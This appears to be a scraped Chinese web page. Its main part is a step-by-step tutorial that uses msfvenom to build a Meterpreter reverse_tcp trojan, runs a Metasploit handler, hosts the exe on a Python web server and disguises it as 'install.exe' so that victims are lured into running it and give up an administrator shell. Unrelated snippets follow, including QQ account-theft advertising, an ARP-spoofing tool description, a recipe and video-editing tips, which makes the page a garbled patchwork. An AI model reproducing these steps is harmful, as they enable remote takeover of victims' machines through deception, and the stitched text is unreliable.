使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。
攻击机(kali):192.168.29.130
被攻击机(window server 2008 SP2):192.168.29.135
1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)
3.实施攻击操作
4.kali攻击机将木马文件拷贝到指定目录
5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 80
6.查看被攻击者的IP地址详情
7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地
9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是更高administrator权限
原文链接
开启pr,导进一段视频素材,选定时间线上的视频素材,鼠标点击点一下速率/延迟时间,将速率调快到百分之六十,時间插值法设定为光流法,明确,设定进行后视頻在播放的时候会全自动补帧,最终导出来视頻就可以。...
盗号并不算什么黑客技术,你自己去普通中小学校都可以找到会盗号的人。本回答。盗号高手先qq后付款在线专业qq盗号专家qq怎么盗号教程其他类似。 去黒客动画吧找下热心的黑客高手看看,他们肯定会很热心的帮...
婚外情意味着不忠和背叛婚姻。然而,婚外情的发生并非毫无根据。这种情况或多或少会发生在内部和外部环境中。感受爱真的是一件非常混乱的事情。不能简单地根据好坏来判断。也许理性的考虑有助于很好地处理这个棘手的...
懒人版的叉烧肉,以前从不吃肥肉的我,叉烧这种做法也能多吃几块,瘦肉的部分也非常的醇香,肥肉肥而不腻特别解馋,配上大米饭今天晚上又要吃撑了! 【食材】 五花肉400g、姜2块、葱3根...
电子邮箱使用,特别是应用于商务办公中,在邮件收发时不小心删除了邮件怎么恢复呢?TOM收费邮箱的数据恢复功能可以在找回30天内彻底删除的邮件,只需要一键开启即可直接使用了。...
点下面红圈里的图标进行诈骗目标挑选,左面选网关(2.43.1),右边选诈骗目标(10.2.43.107),能够挑选多台主机进行诈骗。 Testing:当程序得到了列表中主机的网络管理员账号时,Cred...